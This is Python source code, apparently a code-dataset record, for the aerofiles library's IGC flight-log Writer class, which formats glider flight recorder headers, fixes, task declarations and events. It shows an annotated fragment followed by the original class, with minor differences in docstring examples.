if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
    def write_headers(self, headers):
        """
        Write all the necessary headers in the correct order::

            writer.write_headers({
                'manufacturer_code': 'XCS',
                'logger_id': 'TBX',
                'date': datetime.date(1987, 2, 24),
                'fix_accuracy': 50,
                'pilot': 'Tobias Bieniek',
                'copilot': 'John Doe',
                'glider_type': 'Duo Discus',
                'glider_id': 'D-KKHH',
                'firmware_version': '2.2',
                'hardware_version': '2',
                'logger_type': 'LXNAVIGATION,LX8000F',
                'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
                'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
                'competition_id': '2H',
                'competition_class': 'Doubleseater',
            })

            # -> AXCSTBX
            # -> HFDTE240287
            # -> HFFXA050
            # -> HFPLTPILOTINCHARGE:Tobias Bieniek
            # -> HFCM2CREW2:John Doe
            # -> HFGTYGLIDERTYPE:Duo Discus
            # -> HFGIDGLIDERID:D-KKHH
            # -> HFDTM100GPSDATUM:WGS-1984
            # -> HFRFWFIRMWAREVERSION:2.2
            # -> HFRHWHARDWAREVERSION:2
            # -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
            # -> HFGPSuBLOX LEA-4S-2,16,max9000m
            # -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
            # -> HFCIDCOMPETITIONID:2H
            # -> HFCCLCOMPETITIONCLASS:Doubleseater

        This method will throw a :class:`ValueError` if a mandatory header
        is missing and will fill others up with empty strings if no value
        was given. The optional headers are only written if they are part
        of the specified :class:`dict`.

        .. admonition:: Note

            The use of this method is encouraged compared to calling all
            the other header-writing methods manually!

        :param headers: a :class:`dict` of all the headers that should be
            written.
        """
        # Fail early if one of the mandatory headers is missing.
        for header in self.REQUIRED_HEADERS:
            if header not in headers:
                raise ValueError('%s header missing' % header)
        # The A record must be the very first record of the file.
        self.write_logger_id(
            headers['manufacturer_code'],
            headers['logger_id'],
            extension=headers.get('logger_id_extension')
        )
        # Mandatory headers; missing non-required ones fall back to
        # defaults (fix accuracy, GPS datum) or empty strings.
        self.write_date(headers['date'])
        self.write_fix_accuracy(headers.get('fix_accuracy'))
        self.write_pilot(headers.get('pilot', ''))
        if 'copilot' in headers:
            self.write_copilot(headers['copilot'])
        self.write_glider_type(headers.get('glider_type', ''))
        self.write_glider_id(headers.get('glider_id', ''))
        self.write_gps_datum(
            code=headers.get('gps_datum_code'),
            gps_datum=headers.get('gps_datum'),
        )
        self.write_firmware_version(headers.get('firmware_version', ''))
        self.write_hardware_version(headers.get('hardware_version', ''))
        self.write_logger_type(headers['logger_type'])
        self.write_gps_receiver(headers['gps_receiver'])
        self.write_pressure_sensor(headers.get('pressure_sensor', ''))
        # Optional headers: only written when explicitly provided.
        if 'competition_id' in headers:
            self.write_competition_id(headers['competition_id'])
        if 'competition_class' in headers:
            self.write_competition_class(headers['competition_class'])
        if 'club' in headers:
            self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
    def write_task_metadata(
            self, declaration_datetime=None, flight_date=None,
            task_number=None, turnpoints=None, text=None):
        """
        Write the task declaration metadata record::

            writer.write_task_metadata(
                datetime.datetime(2014, 4, 13, 12, 53, 2),
                task_number=42,
                turnpoints=3,
            )
            # -> C130414125302000000004203

        There are sensible defaults in place for all parameters except for
        the ``turnpoints`` parameter. If you don't pass that parameter the
        method will raise a :class:`ValueError`. The other parameter
        defaults are mentioned in the list below.

        :param declaration_datetime: a :class:`datetime.datetime` instance
            of the UTC date and time at the time of declaration (default:
            current date and time)
        :param flight_date: a :class:`datetime.date` instance of the
            intended date of the flight (default: ``000000``, which means
            "use declaration date")
        :param task_number: task number for the flight date or an
            integer-based identifier (default: ``0001``)
        :param turnpoints: the number of turnpoints in the task (not
            counting start and finish points!)
        :param text: optional text to append to the metadata record
        """
        if declaration_datetime is None:
            declaration_datetime = datetime.datetime.utcnow()
        # Accept either a datetime (formatted as DDMMYYHHMMSS) or an
        # already-formatted string, which is then validated.
        if isinstance(declaration_datetime, datetime.datetime):
            declaration_datetime = (
                self.format_date(declaration_datetime) +
                self.format_time(declaration_datetime)
            )
        elif not patterns.DATETIME.match(declaration_datetime):
            raise ValueError('Invalid declaration datetime: %s' %
                             declaration_datetime)
        # '000000' is the spec placeholder for "same as declaration date".
        if flight_date is None:
            flight_date = '000000'
        else:
            flight_date = self.format_date(flight_date)
        if task_number is None:
            task_number = 1
        elif not isinstance(task_number, int):
            raise ValueError('Invalid task number: %s' % task_number)
        if not isinstance(turnpoints, int):
            raise ValueError('Invalid turnpoints: %s' % turnpoints)
        # Layout: DDMMYYHHMMSS + flight date + 4-digit task number +
        # 2-digit turnpoint count.
        record = '{0}{1}{2:04d}{3:02d}'.format(
            declaration_datetime,
            flight_date,
            task_number,
            turnpoints,
        )
        if text:
            record += text
        self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_task_points(self, points):
"""
Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points.
"""
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
    def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
                  pressure_alt=None, gps_alt=None, extensions=None):
        """
        Write a fix record::

            writer.write_fix(
                datetime.time(12, 34, 56),
                latitude=51.40375,
                longitude=6.41275,
                valid=True,
                pressure_alt=1234,
                gps_alt=1432,
            )
            # -> B1234565124225N00624765EA0123401432

        :param time: UTC time of the fix record (default:
            :meth:`~datetime.datetime.utcnow`)
        :param latitude: longitude of the last GPS fix
        :param longitude: latitude of the last GPS fix
        :param valid: ``True`` if the current GPS fix is 3D
        :param pressure_alt: altitude to the ICAO ISA above the
            1013.25 hPa sea level datum
        :param gps_alt: altitude above the WGS84 ellipsoid
        :param extensions: a list of extension values according to previous
            declaration through
            :meth:`~aerofiles.igc.Writer.write_fix_extensions`
        """
        if time is None:
            time = datetime.datetime.utcnow()
        record = self.format_time(time)
        record += self.format_latitude(latitude)
        record += self.format_longitude(longitude)
        # 'A' marks a valid 3D fix, 'V' anything else.
        record += 'A' if valid else 'V'
        record += '%05d' % (pressure_alt or 0)
        record += '%05d' % (gps_alt or 0)
        # Extension values must exactly match the earlier I record
        # declaration (both presence and per-value width).
        if self.fix_extensions or extensions:
            if not (isinstance(extensions, list) and
                    isinstance(self.fix_extensions, list)):
                raise ValueError('Invalid extensions list')
            if len(extensions) != len(self.fix_extensions):
                raise ValueError(
                    'Number of extensions does not match declaration')
            for type_length, value in zip(self.fix_extensions, extensions):
                length = type_length[1]
                # Numeric values are zero-padded to the declared width;
                # strings are taken as-is and only length-checked.
                if isinstance(value, (int, float)):
                    value = ('%0' + str(length) + 'd') % value
                if len(value) != length:
                    raise ValueError('Extension value has wrong length')
                record += value
        self.write_record('B', record)
    def write_event(self, *args):
        """
        Write an event record::

            writer.write_event(datetime.time(12, 34, 56), 'PEV')
            # -> E123456PEV

            writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
            # -> E123456PEVSome Text

            writer.write_event('PEV')  # uses utcnow()
            # -> E121503PEV

        :param time: UTC time of the event record (default:
            :meth:`~datetime.datetime.utcnow`)
        :param code: event type as three-letter-code
        :param text: additional text describing the event (optional)
        """
        # Dispatch on the number of positional arguments:
        #   (time, code, text) | (code,) | (time, code) | (code, text)
        num_args = len(args)
        if not (1 <= num_args <= 3):
            raise ValueError('Invalid number of parameters received')
        if num_args == 3:
            time, code, text = args
        elif num_args == 1:
            code = args[0]
            time = text = None
        elif isinstance(args[0], (datetime.time, datetime.datetime)):
            # Two arguments; the first looks like a time -> (time, code).
            time, code = args
            text = None
        else:
            code, text = args
            time = None
        if time is None:
            time = datetime.datetime.utcnow()
        if not patterns.THREE_LETTER_CODE.match(code):
            raise ValueError('Invalid event code')
        record = self.format_time(time)
        record += code
        if text:
            record += text
        self.write_record('E', record)
    def write_satellites(self, *args):
        """
        Write a satellite constellation record::

            writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
            # -> F12345601020522

        :param time: UTC time of the satellite constellation record
            (default: :meth:`~datetime.datetime.utcnow`)
        :param satellites: a list of satellite IDs as either two-character
            strings or integers below 100
        """
        # Dispatch on argument count: (satellites,) or (time, satellites).
        num_args = len(args)
        if num_args not in (1, 2):
            raise ValueError('Invalid number of parameters received')
        if num_args == 1:
            satellites = args[0]
            time = None
        else:
            time, satellites = args
        if time is None:
            time = datetime.datetime.utcnow()
        record = self.format_time(time)
        for satellite in satellites:
            # Integer IDs are zero-padded to two digits; anything that
            # does not end up exactly two characters wide is rejected.
            if isinstance(satellite, int):
                satellite = '%02d' % satellite
            if len(satellite) != 2:
                raise ValueError('Invalid satellite ID')
            record += satellite
        self.write_record('F', record)
    def write_k_record(self, *args):
        """
        Write a K record::

            writer.write_k_record_extensions([
                ('FXA', 3), ('SIU', 2), ('ENL', 3),
            ])
            writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
            # -> J030810FXA1112SIU1315ENL
            # -> K02030402313002

        :param time: UTC time of the k record (default:
            :meth:`~datetime.datetime.utcnow`)
        :param extensions: a list of extension values according to previous
            declaration through
            :meth:`~aerofiles.igc.Writer.write_k_record_extensions`
        """
        # Dispatch on argument count: (extensions,) or (time, extensions).
        num_args = len(args)
        if num_args not in (1, 2):
            raise ValueError('Invalid number of parameters received')
        if num_args == 1:
            extensions = args[0]
            time = None
        else:
            time, extensions = args
        if time is None:
            time = datetime.datetime.utcnow()
        record = self.format_time(time)
        # Extension values must exactly match the earlier J record
        # declaration (both presence and per-value width).
        if not (isinstance(extensions, list) and
                isinstance(self.k_record_extensions, list)):
            raise ValueError('Invalid extensions list')
        if len(extensions) != len(self.k_record_extensions):
            raise ValueError(
                'Number of extensions does not match declaration')
        for type_length, value in zip(self.k_record_extensions, extensions):
            length = type_length[1]
            # Numeric values are zero-padded to the declared width;
            # strings are taken as-is and only length-checked.
            if isinstance(value, (int, float)):
                value = ('%0' + str(length) + 'd') % value
            if len(value) != length:
                raise ValueError('Extension value has wrong length')
            record += value
        self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_fix_accuracy | python | def write_fix_accuracy(self, accuracy=None):
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy) | Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional) | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L153-L173 | null | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
